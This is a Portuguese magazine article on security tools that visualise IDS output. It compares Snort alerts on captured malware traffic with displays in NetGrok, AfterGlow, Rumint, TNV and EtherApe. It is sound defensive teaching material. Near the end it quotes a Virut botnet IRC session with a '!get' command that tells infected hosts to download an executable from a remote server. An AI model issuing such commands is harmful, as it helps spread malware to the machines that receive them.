Ferramentas para visualizar a saída do IDS



Documentos relacionados
MINISTÉRIO DA EDUCAÇÃO

Manual do Desktop Sharing. Brad Hards Tradução: Marcus Gama

Sistema topograph 98. Tutorial Módulo Fundiário

Visualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes)

Sistemas Operacionais. Curso Técnico Integrado Profa: Michelle Nery

DarkStat para BrazilFW

Superintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá. LibreOffice Impress Editor de Apresentação

Boletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema

PowerPoint 2010 para o Office 365 para empresas

Notas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0

Tutorial de uso do Subversion com RapidSVN

O QUE É A CENTRAL DE JOGOS?

1. Capturando pacotes a partir da execução do traceroute

TRBOnet MDC Console. Manual de Operação

O EDITOR DE APRESENTAÇÕES POWER POINT

Procedimentos para Configuração de Redirecionamento de Portas

Portaria Express 2.0

Sistemas Operacionais. Prof. André Y. Kusumoto

Como criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo.

CADASTRO DE OBRAS E PROJETOS DE ENGENHARIA

Notas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1

Tutorial ConvertXtoDVD 3

Usando o Conference Manager do Microsoft Outlook

Primeiros passos das Planilhas de Obra v2.6

Prof. Marcos Monteiro.

... MANUAL DO MODERADOR SERVIÇOS DE WEB

MANUAL DA SECRETARIA

Manual do usuário. Viewer

1. Explicando Roteamento um exemplo prático. Através da análise de uns exemplos simples será possível compreender como o roteamento funciona.

Guia: como instalar o Ubuntu Linux

Do Word 2007 para o Office 365 para empresas

Objetivo: descrever como abrir uma solicitação de suporte técnico através da internet.

Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM

Simulado Informática Concurso Correios - IDEAL INFO

TOP SAÚDE SEPACO AUTOGESTÃO

Exemplo: Na figura 1, abaixo, temos: Clique aqui para continuar, que é a primeira atividade que você precisa realizar para iniciar seus estudos.

TUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA. Os dados de suas coletas devem ser organizados em uma planilha eletrônica, de modo

Lab 4 Análise de Pacotes utilizando o TCPDUMP

Manual do Usuário. Protocolo

Manual de instalação, configuração e utilização do Assinador Betha

MANUAL DIPAM A Versão de 10/05/2012

Projeto ECA na Escola - Plataforma de Educação à Distância

INSTRUÇÕES DE INSTALAÇÃO

Para o PowerPoint, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.

Lync Acessando o Lync Web App

No projeto das primeiras redes de computadores, o hardware foi a principal preocupação e o software ficou em segundo plano.

FEMA Fundação Educacional Machado de Assis INFORMÁTICA Técnico em Segurança do Trabalho P OW ERPOI NT. Escola Técnica Machado de Assis Imprensa

Experiência 05: CONFIGURAÇÃO BÁSICA DE UMA REDE. Objetivo Geral Criar uma rede ponto-a-ponto com crossover e utiizando switch.

Manual de Utilização do PDV Klavix

Redes Ponto a Ponto. Os drivers das placas de rede devem estar instalados.

Composição de Layout no Spring

Figura 1: tela inicial do BlueControl COMO COLOCAR A SALA DE INFORMÁTICA EM FUNCIONAMENTO?

Insight Teacher Quickstart Guide

MANUAL DE INSTALAÇÃO O melhor sistema de Gestão Financeira para micro e pequenas empresas.

Wireshark Lab: Iniciando

Configurações das notificações do sistema. Mike McBride Tradução: Lisiane Sztoltz

1. REGISTRO DE PROJETOS

Veja em Tela cheia abaixo: Página nº 2

Padrão ix. Q-Ware Cloud File Publisher Manual para realização do Donwload de Arquivos. Versão

OpenOffice Calc Aula 4

Curso de Informática Básica

LINEAR-HCS RUA SÃO JORGE, 269 TELEFONE: (11) SÃO CAETANO DO SUL SÃO PAULO CEP:

CÓPIA E EXPORTAÇÃO DE SALA

Manual Rápido de Registro e Configuração do DJPDV

FileMaker Pro 13. Utilização de uma Conexão de Área de Trabalho Remota com o FileMaker Pro 13

Introdução ao icare 2

UNIVERSIDADE FEDERAL DO AMAPÁ PRÓ REITORIA DE ADMINISTRAÇÃO E PLANEJAMENTO DEPARTAMENTO DE INFORMÁTICA. Manual do Moodle- Sala virtual

Configurando um Grupo Doméstico e Compartilhando arquivos no Windows 7

MANUAL DE CONFIGURAÇÃO

OFICINA DE POWER POINT

Unidade 3: Personalizando o Excel *

Manual de Orientação para Acesso e Uso do SARA Versão ERA s

VERSÃO: 1.3 TÍTULO: GUIA DE INÍCIO RÁPIDO CLIENTE: FUNCEF

Seja muito bem-vinda(o) ao Curso de Gestão em Projetos Sociais - PMD Pro1!

Terminal de Consulta de Preço. Linha Vader. Modelo TT300 e TT1000i

LABORATÓRIO UNIDADES 1 REVISÃO LINUX E COMANDOS BÁSICOS ABRINDO A MÁQUINA VIRTUAL UBUNTU SERVER PELO VIRTUALBOX

Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede

Configurando o Controle dos Pais no Windows Vista

Manual de Utilizador. Caderno. Recursos da Unidade Curricular. Gabinete de Ensino à Distância do IPP.

Simulador PMP - 4º Edição Exame de Certificação do PMI

MÓDULO DE MATRICULA UNASUS

Para o OpenOffice Impress, assim como para vários softwares de apresentação, uma apresentação é um conjunto de slides.

Manual do Software Pctel Supervisor Desktop

Guia do Usuário. idocs Content Server v

CADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word Sumário

Usando o do-file editor Automatizando o Stata

Guia de Usuário do Servidor do Avigilon Control Center. Versão 5.6

Neste tópico, abordaremos a funcionalidade de segurança fornecida com o SAP Business One.

Neste tópico, veremos como selecionar e copiar informações entre bancos de dados de empresa no SAP Business One.

Guia do Usuário do Aplicativo Desktop Client

Manual Banco de dados MySQL

Manual do Teclado de Satisfação Online WebOpinião

Manual de Utilização

GESTÃO DE INFORMAÇÃO PESSOAL OUTLOOK (1)

Gravando Dados e Cópias de CD s com o Nero 6.0 Disciplina Operação de Sistemas Aplicativos I

ROTEIRO PARA EMISSÃO DE CERTIFICADO DIGITAL A1

NOTA: A calibração instrumentada não é compatível com a KODAK Photo Printer 6800/6850 e a KODAK Photo Printer 605.

Transcrição:

Ferramentas para visualizar a saída do IDS A visão do IDS CAPA Encontre invasores com essas fáceis ferramentas de visualização. por Russ Mcree Marcel Hol www.sxc.hu A enchente de dados brutos gerados pelos sistemas de detecção de intrusão (IDS) costuma ser grande demais para especialistas em segurança, e os sinais claros de invasão acabam muitas vezes passando despercebidos em meio ao ruído. As ferramentas de visualização de segurança oferecem uma forma fácil e intuitiva para guiar o especialista pelos meandros de informação rumo aos padrões indicadores de intrusão. Certas ferramentas de análise e detecção usam a biblioteca Packet Capture (PCAP, como é mais conhecida) para capturar o tráfego. Vários aplicativos que a utilizam conseguem salvar num arquivo PCAP os dados coletados durante uma sessão de escuta, de forma a permitir sua leitura e análise com outras ferramentas. Os arquivos PCAP oferecem uma forma conveniente de preservar e recapitular dados de invasão. Este artigo utiliza a PCAP para explorar algumas ferramentas de visualização livres. Em cada cenário será mostrada a aparência do ataque segundo o sistema de detecção de intrusão Snort [1], e em seguida o visual do mesmo incidente num aplicativo de visualização de segurança. Este artigo também explora as ferramentas de visualização NetGrok, AfterGlow, Rumint, TNV e Ether Ape. A maioria delas está disponível no live CD DAVIX [2], um sistema baseado no Slax e pré-carregado com várias ferramentas livres de análise e visualização. A forma mais fácil de explorar as ferramentas deste artigo é baixar o DAVIX. Caso seja preferível instalar os aplicativos no seu próprio sistema, confira os sites dos projetos para mais informações de instalação. A discussão a seguir supõe que o leitor possua conhecimentos básicos de sistemas de detecção de intrusão em geral, além do Snort em particular. Se você não tiver experiência com o Snort, confira seu manual do usuário no website do projeto [3]. Também há excelentes tutoriais de Snort online e impressos. Para este artigo, foi utilizada uma grande variedade de malwares, e as capturas de pacotes foram realizadas durante os ataques. Além destas, também foi usada uma captura de pacotes do OpenPacket.org, uma ótima fonte de capturas, assim como do EvilFingers.com, outro bom repositório de PCAP. O wiki do NetworkMiner [4], uma ferramenta para Windows de análise de PCAPs, inclui uma excelente lista de sites de PCAPs. Os arquivos deste artigo foram lidos pelo venerável Snort 2.7 num sistema Ubuntu 9.04 com as regras emerging-all.rules do site EmergingThreats.net. Se você tiver vontade de experimentar o DAVIX, use-o no modo gráfico com KDE dentro de uma máquina virtual com pelo menos 1 GB de memória. Essa quantidade de memória fornecerá espaço suficiente para garantir um bom desempenho do Snort na linha de comando e para oferecer poder suficiente para as exigentes ferramentas de visualização. NetGrok O NetGrok [5] que é uma ferramenta de visualização em Java, é independente de sistema operacional que lê arquivos PCAP diretamente e é capaz de escutar numa interface de rede. Especificamente, o NetGrok se descreve como...uma excelente ferramenta de diagnóstico em tempo Linux Magazine #59 Outubro de 2009 41

CAPA Visualização de IDS real, que permite a rápida compreensão do tráfego de rede e a detecção fácil de problemas. O NetGrok é o resultado de um esforço durante o curso Information Visualization de 2008 lecionado por Ben Schneiderman na Universidade de Maryland, EUA. A equipe anunciou recentemente que o NetGrok será incorporado ao live CD DAVIX. A ferramenta de visualização NetGrok possui duas dependências, ambas já contidas no arquivo baixado, embora cada uma necessite de mais etapas de instalação. O pacote inclui uma versão antiga da Libpcap, mas é possível atualizála com apt-get install libpcap0.8 em qualquer sistema Debian ou Ubuntu. O NetGrok também requer a Libjpcap. Depois de descompactar o Net- Grok, entre no diretório Netgrok/lib/ linux/. Copie os arquivos da Libjpcap (libjpcap.so e jpcap.jar) para os diretórios /usr/lib/jvm/java6openjdk/ jre/lib/i386/ e /usr/lib/jvm/java6openjdk/jre/lib/ext/, respectivamente, ou equivalentes na sua distribuição. Em seguida, talvez seja necessário ajustar o arquivo groups.ini disponível na raiz do NetGrok. Em particular, os testes deste artigo apagaram a menção a redes sem fio na referência a Private1. Para testar o NetGrok, foi usado o PCAP Kraken.pcap, disponível no OpenPacket.org e listado na categoria Malicious (maliciosos) [6]. O arquivo tinha originalmente o nome 12b0c78f05f33fe25e08addc60bd9b7c.pcap devido ao hash MD5 do binário que gerou o tráfego, mas foi simplificado aqui para ficar de acordo com o nome malware. O Kraken é um spam bot; esta variante utiliza a porta TCP/UDP 447 para comando e controle. Após copiar o arquivo emergingall.rules do EmergingThreats.net para o diretório de regras do Snort e ativá-lo no arquivo snort.conf, foi executado o arquivo kraken.pcap por meio do Snort: sudo snort -c /etc/snort/snort. conf -r kraken.pcap -l output /kraken A listagem 1 mostra os alertas resultantes desse comando. Os alertas indicam claramente uma conversa entre a vítima, 192.168.2.5, e o servidor de comando e controle, 66.29.87.159. Com essas informações, como o NetGrok encontra algo? Inicie o NetGrok com o comando java -jar netgrok20080928.jar. Será mostrada uma interface simples e elegante; em seguida, clique em File e Open PCAP File e selecio- Listagem 1: Arquivo kraken.pcap no Snort 01 [**] [1:2008105:3] ET TROJAN Bobax/Kraken/Oderoor UDP 447 CnC Channel Initial Packet Inbound [**] 03 02/22 04:20:53.112408 66.29.87.159:447 > 192.168.2.5:1052 04 UDP TTL:48 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF 05 Len: 24 06 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/virus/trojan_bobax] 07 [Xref => http://doc.emergingthreats.net/bin/view/main/oderoor] 08 09 [**] [1:2008108:3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Inbound [**] 10 [Classification: A Network Trojan was detected] [Priority: 1] 11 02/22 04:20:53.806447 66.29.87.159:447 > 192.168.2.5:1054 12 TCP TTL:48 TOS:0x0 ID:23263 IpLen:20 DgmLen:1500 DF 13 ***A**** Seq: 0xC6815265 Ack: 0x1D12B7D Win: 0x16D0 TcpLen: 20 14 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/virus/trojan_bobax] 15 [Xref => http://doc.emergingthreats.net/bin/view/main/oderoor] 16 17 [**] [1:2008110:3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Outbound [**] 18 [Classification: A Network Trojan was detected] [Priority: 1] 19 02/22 04:20:53.810649 192.168.2.5:1054 > 66.29.87.159:447 20 TCP TTL:128 TOS:0x0 ID:459 IpLen:20 DgmLen:40 DF 21 ***A**** Seq: 0x1D12B7D Ack: 0xC6815DCD Win: 0x4470 TcpLen: 20 22 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/virus/trojan_bobax] 23 [Xref => http://doc.emergingthreats.net/bin/view/main/oderoor] 24 25 [**] [1:2008103:3] ET TROJAN Bobax/Kraken/Oderoor TCP 447 CnC Channel Initial Packet Outbound [**] 26 [Classification: A Network Trojan was detected] [Priority: 1] 27 02/22 04:20:54.367395 192.168.2.5:1055 > 66.29.87.159:447 28 TCP TTL:128 TOS:0x0 ID:475 IpLen:20 DgmLen:64 DF 29 ***AP*** Seq: 0x95E9CBD1 Ack: 0xC63DF5FA Win: 0x4470 TcpLen: 20 30 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/virus/trojan_bobax] 31 [Xref => http://doc.emergingthreats.net/bin/view/main/oderoor] 42 http://www.linuxmagazine.com.br

Visualização de IDS CAPA Figura 1 Arquivo kraken.pcap na visão de grafos do NetGrok. ne kraken.pcap. Serão mostradas representações visuais de acordo com os dados gerados pelo Snort (figura 1). Os nós em vermelho são aqueles que usam a maior parte da banda, enquanto que os verdes usam a menor parte e os transparentes marcam máquinas que não utilizam banda alguma. As máquinas dentro da região tracejada são locais, ao passo que todas as demais encontram-se fora da rede local. Listagem 2: Arquivo ecard.pcap no Snort Para aproximar um nó, dê um duplo clique nele; ao passar sobre o nó, serão exibidos detalhes sob demanda na interface do NetGrok. No caso dos nós vermelhos, o mouse revelará seu endereço IP como 192.168.2.5. Ao passar sobre o nó marrom (o que utiliza a segunda maior quantidade de banda), será exibido o IP 66.29.87.159. Estes resultados estão perfeitamente de acordo com a saída do Snort. É possível ver a vítima 192.168.2.5 conversando com 01 [**] [1:2007701:4] ET TROJAN Storm Worm Encrypted Variant 1 Traffic (1) [**] 03 05/03 15:07:28.722225 79.115.64.162:22149 > 192.168.248.105:22724 04 UDP TTL:116 TOS:0x0 ID:28417 IpLen:20 DgmLen:53 05 Len: 25 06 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs /VIRUS/TROJAN_Storm] 07 [Xref => http://doc.emergingthreats.net/2007701] o servidor de comando e controle 66.29.87.159. O NetGrok também permite exibir visões de TreeMap [7]. Essa visão é ideal para grandes arquivos PCAP sem oclusão. Este artigo utilizou o PCAP ecard.pcap, uma captura obtida ao analisar o malware Storm. Este malware conversa incessantemente com seus pares por meio de UDP criptografado e gera muito ruído nos logs. O alerta do Snort é exibido na listagem 2. A visualização em TreeMap no Net- Grok define dois fatos claros. O maior falante é claramente 192.168.248.105 (507.403 bytes marcados como o grande cubo vermelho), que se encontra na rede local, indicada pela linha preta mais grossa que o separa das máquinas externas. A outra descoberta óbvia é a imensidão de pares com os quais a máquina local conversou em trechos de 106 a 212 bytes. O NetGrok também inclui úteis mecanismos de filtragem para permitir o isolamento de máquinas por IP, banda e grau (recebidos versus enviados). AfterGlow O AfterGlow [8], fruto de Raffael Marty, autor de Applied Security Visualization, é uma das muitas ferramentas de virtualização incluídas na distribuição DAVIX, facilmente acessível pelo menu Visualize. Como o AfterGlow usa dados no estilo CSV como entrada, foi usado o script tcpdump2csv.pl disponível em /usr/local/bin/ no DAVIX. O script Listagem 3: Arquivo camda.pcap no Snort 01 [**] [1:2000347:7] ET ATTACK RESPONSE IRC Private message on non std port [**] 03 05/03 14:52:09.693897 192.168.248.105:1156 > 64.32.28.7:5553 04 TCP TTL:128 TOS:0x0 ID:24739 IpLen:20 DgmLen:122 DF 05 ***AP*** Seq: 0xDE571EA6 Ack: 0xA4EB6BC Win: 0xFD92 TcpLen: 20 06 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/attack_response/attack_response_ Non Standard_IRC] 07 [Xref => http://doc.emergingthreats.net/bin/view/main/2000347] Linux Magazine #59 Outubro de 2009 43

CAPA Visualização de IDS recebe a saída do tcpdump e grava um arquivo CSV. O uso recomendado do After- Glow normalmente inclui enviar (por pipes) todas as etapas para um único comando, mas a conversão de tcpdump para CSV é mais útil para propósitos de ilustração. Foi usado o camda.pcap, uma captura obtida durante a análise de uma amostra de Flood IRC. Os resultados de alertas do Snort do camda.pcap são mostrados na listagem 3. Para converter esse arquivo PCAP para CSV, foi executado o seguinte comando: tcpdump -vttttnnelr camda.pcap /usr/local/bin/tcpdump2csv.pl sip dip dport > camda.csv O tcpdump2csv.pl permite selecionar vários campos possíveis para gravar na saída CSV, incluindo marcas de hora, destino e origem IP, MAC e porta, assim como time-to-live (TTL) e outros parâmetros. Confira o conteúdo do script para mais detalhes. Para enviar o arquivo camda.csv resultante para o AfterGlow, foi usado: cat camda.csv afterglow.pl -c /usr/local/share/afterglow /color.properties -v dot -Tgif -o camda.gif A figura 2 inclui o tráfego local já esperado, mas também acentua as descobertas do Snort relativas ao tráfego IRC. Note que o IP de origem 192.168. 248.105 está conversando com o IP 64.32.28.7 por meio da porta 5553 (uma porta não padrão do IRC). O AfterGlow gera saída em DOT para o GraphViz, portanto requer as ferramentas do GraphViz para gerar a imagem e o mapa da imagem. O GraphViz inclui o comando dot, que gera desenhos hierárquicos ou em camadas, enquanto o neato e o fdp geram modelos de mola, o twopi desenha diagramas radiais e o circo cria esquemas circulares. Um ótimo exemplo de imagem de modelo de mola se encontra no secviz.org [9]. Rumint O rumint de Greg Conti [10] é uma útil ferramenta de visualização que recebe arquivos PCAP sem manipulação ou conversão. Este artigo usou um dos arquivos PCAP anônimos do EvilFingers (anon_sid_2000032_2000033_5219_200 1337.pcap) para mostrar os poderes do rumint. Este exercício específico se mostrou útil em duas ocasiões. Como não há como ter certeza de que a análise do malware tenha sido feita por alguém competente afinal, os arquivos do EvilFingers são anônimos, este exercício oferece a oportunidade de demonstrar o valor da saída do Snort (particularmente Figura 2 Arquivo camda.pcap no AfterGlow. Listagem 4: Arquivo korgo.pcap no Snort ao executar as regras de Emerging Threats), assim como a visualização correspondente. Um dos alertas do Snort gerados por esse PCAP imediatamente identifica uma variante do Korgo.P como culpado. O Korgo, assim como o Padobot, é um antigo worm que explorava uma vulnerabilidade do LSASS do Microsof Windows em 2004. Segundo a F-Secure, como mostra o alerta abaixo, o worm contacta computadores remotos na porta TCP 445, explora a vulnerabilidade do LSASS e copia 01 [**] [1:2001337:7] ET WORM Korgo.P offering executable [**] 03 06/27 19:47:17.324095 210.233.108.48:2710 > 30.221.239.80:445 04 TCP TTL:128 TOS:0x0 ID:49809 IpLen:20 DgmLen:1500 DF 05 ***A**** Seq: 0xDBBC709A Ack: 0xB6E50743 Win: 0xFDBF TcpLen: 20 06 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs /VIRUS/WORM_KORGO] 07 [Xref => http://doc.emergingthreats.net/2001337][xref => http:// www.f secure.com/v descs/korgo_p.shtml] Figura 3 Arquivo korgo.pcap na plotagem paralela de coordenadas. 44 http://www.linuxmagazine.com.br

Visualização de IDS CAPA Listagem 5: Arquivo gtbot.pcap no Snort 01 [**] [1:100000272:3] COMMUNITY BOT GTBot ver command [**] 03 10/04 18:25:15.656786 84.244.1.30:5050 > 192.168.1.1:1101 04 TCP TTL:64 TOS:0x0 ID:53296 IpLen:20 DgmLen:348 DF 05 ***AP*** Seq: 0xCA5E0BB6 Ack: 0xB97E3616 Win: 0x16D0 TcpLen: 20 Figura 4 Arquivo gtbot.cap no TNV. seu arquivo para o sistema remoto. O alerta do Snort que marcou essa descrição é mostrado na listagem 4. O arquivo PCAP anon_sid foi renomeado para korgo.pcap, que em seguida foi usado para executar o rumint. Para isso, bastou o rumint a partir do menu do DAVIX, clicar em File e depois em Load PCAP Dataset. Após o PCAP ser carregado no buffer, deve-se clicar em View e escolher algumas das sete opções. Recomenda-se a visualização Parallel Coordinate Plot com seis eixos. Para este PCAP, configuramos os eixos da seguinte forma: IP de origem, IP de destino, porta TCP de origem, porta TCP de destino, ID IP e TTL. O Rumint oferece várias outras opções para a visualização com eixos; basta selecionar pelo tipo de tráfego. A figura 3 imediatamente esclarece o alerta do Snort. Note como cada detalhe indicado no alerta do Snort fica imediatamente evidente no Parallel Coordinate Plot do rumint enquanto ele lê o quadro 22 do PCAP. O IP de origem 210.233.108.48 se conecta ao IP de destino 30.221.239.80 a partir da porta 2710 com destino à porta 445 (comum para malwares que exploram RPCs Microsoft). O alerta do Snort também exibe o ID IP 49809 e um TTL de 128, ambos claramente indicados no quinto e sexto eixos do rumint. TNV O TNV (Time-base Network Visualizer) [11] é escrito em Java e independente de plataforma, também pode usar como entrada saídas criadas para a Libpcap, ou realizar ele próprio a captura a partir de uma interface de sistema. John Goodall, do vizsec.org, criou o TNV como parte de seu trabalho de graduação. É possível usar o TNV diretamente a partir do menu Visualize do DA- VIX. Note que máquinas remotas na região esquerda da interface e a matriz de máquinas locais à direita podem ser reordenadas. Utilizamos uma velha variante do GTBot para gerar o arquivo gtbot.pcap (figura 4). A listagem 5 mostra um dos alertas do Snort gerados a partir do arquivo gtbot.pcap. O TNV é lento para carregar arquivos PCAP maiores, então é preciso ter paciência. Dito isso, provavelmente todos acharão os resultados muito úteis. O alerta do Snort apontou para o IP 84.244.1.30 e a porta de origem 5050 conectando-se a 192.168.1.1 na porta 1101. Essas descobertas são suportadas em todas as três visões do TNV, incluindo o tráfego específico de recebimento por portas (no painel à direita) e 84.244.1.30 conectandose a 192.168.1.1 (no painel primário exemplificado pela linha mais grossa de conexão e uma caixa popout), e os detalhes na visão de todos os pacotes. Para encontrar más intenções em arquivos PCAP menores, o TNV costuma oferecer gratificação instantânea. Não se esqueça de declarar uma faixa doméstica de endereços de rede que inclua o espaço primário de IPs usado no arquivo PCAP analisado. Listagem 6: Arquivo virut.pcap no Snort 01 [**] [1:2003603:3] ET TROJAN W32.Virut.A joining an IRC Channel [**] 03 05/30 23:12:53.343816 210.233.108.48:1048 > 51.93.245.116:65520 04 TCP TTL:128 TOS:0x0 ID:3686 IpLen:20 DgmLen:67 DF 05 ***AP*** Seq: 0x9A24EA7C Ack: 0x55A62BF6 Win: 0xFFFF TcpLen: 20 06 [Xref => http://www.emergingthreats.net/cgi bin/cvsweb.cgi/sigs/virus/trojan_virut] 07 [Xref => http://doc.emergingthreats.net/2003603][xref => http://www.bitcrank.net] Linux Magazine #59 Outubro de 2009 45

CAPA Visualização de IDS EtherApe O EtherApe [12] é mais uma das ofertas do DAVIX, encontrado no menu Visualize. Ele também carrega arquivos PCAP diretamente e, assim como seu compatriota rumint, reprisa o PCAP em tempo real enquanto exibe os resultados. Usando novamente um exemplo de PCAP baixado do EvilFingers. com, recebemos do Snort o alerta da listagem 6 após ele ler o arquivo anon_sid_2000345_2003603.pcap. O arquivo PCAP foi renomeado para virut.pcap porque o W32.Virut.A foi o responsável por essa saída. O W32.Virut.A injeta seu código em todos os processos em andamento, abre uma backdoor na porta 65520 na máquina comprometida e em seguida tenta conectar-se a servidores IRC. O arquivo virut.pcap foi lido pelo EtherApe e os resultados são mostrados na figura 5. A máquina 51.93.245.116 está comprometida e mostra claramente a backdoor aberta na porta TCP 65520. Os dados crus da sessão desse PCAP conforme disponíveis no EvilFingers também confirmam o alerta do Snort em conjunto com a visualização: NICK vouswcmm USER v020501.. :-Service Pack 2 JOIN &virtu :* PRIVMSG vouswcmm :!get http:// ygyyqtqeyp.hj/dl/loadadv735.exe PING :i PONG :i JOIN &virtu Conclusão Uma visão aprimorada de ameaças de segurança leva a uma resposta mais capaz. Nesta altura, o leitor já deve ter entendido e concordado que a visualização de dados de segurança é uma verdadeira parceira do Snort. Quem se interessar pela visualização de dados de segurança pode começar a contribuir com o projeto Figura 5 Arquivo virut.pcap no EtherApe entrando num canal IRC. DAVIX. Especificamente seu líder Jan Monsch indicou que seria um grande trabalho para a comunidade alguém fazer a integração da ferramenta AfterGlow com o DAVIX. Um trabalho desse poderia permitir a conversão de formatos de dados entre diferentes ferramentas, além Mais informações [1] Snort: http://www.snort.org/ [2] DAVIX: http://davix.secviz.org [3] Manual de uso do Snort: http://www.snort.org/docs de tornar o DAVIX mais acessível para muitas pessoas. A maioria das ferramentas disponíveis na distribuição DAVIX requer entradas variadas, às vezes em formatos proprietários. A entrada baseada em CSV para todas as ferramentas seria ótima para expandir o público do DAVIX. n [4] Network Miner: http://networkminer.wiki.sourceforge.net/ Publicly+available+PCAP+files [5] NetGrok: http://www.cs.umd.edu/projects/netgrok/ [6] Repositórios de capturas do OpenPacket.org: https://www.openpacket.org/capture/by_category?category=malicious [7] TreeMap: http://www.cs.umd.edu/hcil/treemap-history/ [8] AfterGlow: http://afterglow.sourceforge.net/ [9] Fogos de artifício: http://secviz.org/content/ visualized-storm-fireworks-your-4th-july [10] Rumint: http://www.rumint.org/ [11] TNV: http://tnv.sourceforge.net/ [12] EtherApe: http://etherape.sourceforge.net/ Gostou do artigo? Queremos ouvir sua opinião. Fale conosco em cartas@linuxmagazine.com.br Este artigo no nosso site: http://lnm.com.br/article/3045 46 http://www.linuxmagazine.com.br

2024 © DocPlayer.com.br Política de Privacidade | Termos de serviço | Feedback